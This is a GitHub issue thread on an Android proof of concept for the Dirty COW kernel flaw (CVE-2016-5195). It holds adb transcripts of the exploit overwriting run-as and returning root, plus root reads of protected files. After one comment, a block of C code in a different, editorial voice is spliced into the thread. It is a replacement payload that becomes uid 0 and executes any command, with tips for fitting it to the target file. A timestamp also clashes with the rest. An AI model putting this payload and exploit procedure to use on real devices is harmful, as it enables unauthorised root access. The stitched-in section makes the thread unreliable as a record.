timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android

run-as doesn't work correctly #12

Closed ghost closed 7 years ago

ghost commented 8 years ago

```
C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell "/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as"
warning: new file size (13776) and file old size (17920) differ

size 17920

[*] mmap 0xb6d3b000
[*] exploit (patch)
[*] currently 0xb6d3b000=464c457f
[*] madvise = 0xb6d3b000 17920
[*] madvise = 0 1048576
[*] /proc/self/mem 1610612736 1048576
[*] exploited 0xb6d3b000=464c457f

C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell
shell@R1_HD:/ $ run-as
running as uid 2000
uid 0
shell@R1_HD:/ $ run-as id
running as uid 2000
uid 0
shell@R1_HD:/ $ exit

C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell run-as id
running as uid 2000
uid 0

C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell run-as ls
running as uid 2000
uid 0

C:\Users\Christian\Desktop\BLU-R1-HD-Bootlaoder-Unlock\BLU-R1-HD-Bootlaoder-Unlock>adb shell run-as ls /dev
running as uid 2000
uid 0
```

joel0 commented 8 years ago

run-as from this repository does not run anything. It gains UID 0, then exits. It's just a proof of concept that it is possible to gain root. Due to SELinux on Android 4.4+, the run-as file can not do much of anything useful, despite its ability to set its UID to 0.
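As an added illustration of the difference joel0 describes (this is example code, not the run-as.c shipped in this repository): a replacement payload that, after raising itself to uid 0, reports the SELinux domain it is running in and then executes whatever command it was given, instead of exiting. The `selinux_domain` parser and the `/proc/self/attr/current` read are my additions; whether the resulting root shell can actually do anything useful still depends entirely on the device's sepolicy, exactly as the comment above says.

```c
// Added example: a run-as style payload that raises privileges, shows its
// SELinux domain, and exec()s the requested command. Not the repository's
// own run-as.c. Build it for the target (e.g. arm, static) before using it
// as the dirtycow overwrite source.
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Extract the type/domain (third colon-separated field) from a SELinux
 * context string such as "u:r:runas:s0". Returns 0 on success, -1 on a
 * malformed context or an output buffer that is too small. */
int selinux_domain(const char *ctx, char *out, size_t outlen) {
    const char *p = ctx;
    for (int i = 0; i < 2; i++) {          /* skip the user and role fields */
        p = strchr(p, ':');
        if (p == NULL)
            return -1;
        p++;
    }
    size_t len = strcspn(p, ":\n");
    if (len == 0 || len >= outlen)
        return -1;
    memcpy(out, p, len);
    out[len] = '\0';
    return 0;
}

/* Read this process's current SELinux context from procfs and return its
 * domain. Fails (-1) on kernels without SELinux or when the read is empty. */
int current_domain(char *out, size_t outlen) {
    char ctx[256];
    FILE *f = fopen("/proc/self/attr/current", "r");
    if (f == NULL)
        return -1;
    size_t n = fread(ctx, 1, sizeof ctx - 1, f);
    fclose(f);
    ctx[n] = '\0';
    return selinux_domain(ctx, out, outlen);
}

/* Become uid/gid 0. Only succeeds when the binary is setuid-root or the
 * caller is already root. Returns 0 on success, -1 with errno set. */
int become_root(void) {
    if (setgid(0) != 0)
        return -1;
    if (setuid(0) != 0)
        return -1;
    return 0;
}

int main(int argc, char **argv) {
    char dom[64];

    printf("running as uid %d\n", getuid());
    if (become_root() != 0) {
        perror("setuid(0)");
        return 1;
    }
    printf("uid %d\n", getuid());

    if (current_domain(dom, sizeof dom) == 0)
        printf("selinux domain: %s\n", dom);  /* e.g. "runas" on Android */

    if (argc < 2)                  /* no command: behave like the PoC and stop */
        return 0;

    execvp(argv[1], argv + 1);     /* e.g. `run-as id` now really runs id */
    perror("execvp");
    return 127;
}
```

Two practical caveats when dropping this in place of the PoC's run-as.c: the compiled payload must not be larger than the file it overwrites (the `new file size ... and file old size ... differ` warning in the transcript above is the PoC checking exactly that), and on an SELinux-enforcing device the exec'd command inherits the `runas` domain, so uid 0 alone does not imply access to anything the policy denies that domain.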

ghost commented 8 years ago

What is this that Manouchehri posted then? He is using the run-as to get root access.

Manouchehri commented 8 hours ago

```
PS C:\Users\david> adb shell
shell@flo:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0
shell@flo:/ $ run-as id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:runas:s0
shell@flo:/ $ ls -lZ /sbin/
opendir failed, Permission denied
1|shell@flo:/ $ run-as ls -lZ /sbin/
-rwxr-x--- root     root              u:object_r:rootfs:s0 adbd
-rwxr-x--- root     root              u:object_r:rootfs:s0 healthd
lrwxrwxrwx root     root              u:object_r:rootfs:s0 ueventd -> ../init
lrwxrwxrwx root     root              u:object_r:rootfs:s0 watchdogd -> ../init
shell@flo:/ $ cat /init.flo.diag.rc
/system/bin/sh: cat: /init.flo.diag.rc: Permission denied
1|shell@flo:/ $ run-as cat /init.flo.diag.rc
# This file gets copied as /init.flo.diag.rc

on post-fs-data
    rm /dev/diag
```

joel0 commented 8 years ago

He may be using something like this fork https://github.com/android-exploit/CVE-2016-5195

Manouchehri commented 8 years ago

@christianrodher That's useful for non-SELinux devices.

I have not posted my SELinux compatible version. It seems a couple journalists are getting me and @timwr mixed up.

ghost commented 8 years ago

@Manouchehri do you plan to post the compatible version?

Manouchehri commented 8 years ago

Not within the next few days. Maybe next month.

ghost commented 8 years ago

:(

timwr commented 8 years ago

@Manouchehri, is your exploit using /system/bin/run-as? Does it work from the untrusted_app sepolicy, e.g. from an installed apk?

Manouchehri commented 8 years ago

I'm using a different target.

@timwr Can you send me your contact info so we can chat?

timwr commented 7 years ago

@Manouchehri you should post a PoC, it'll be less confusing.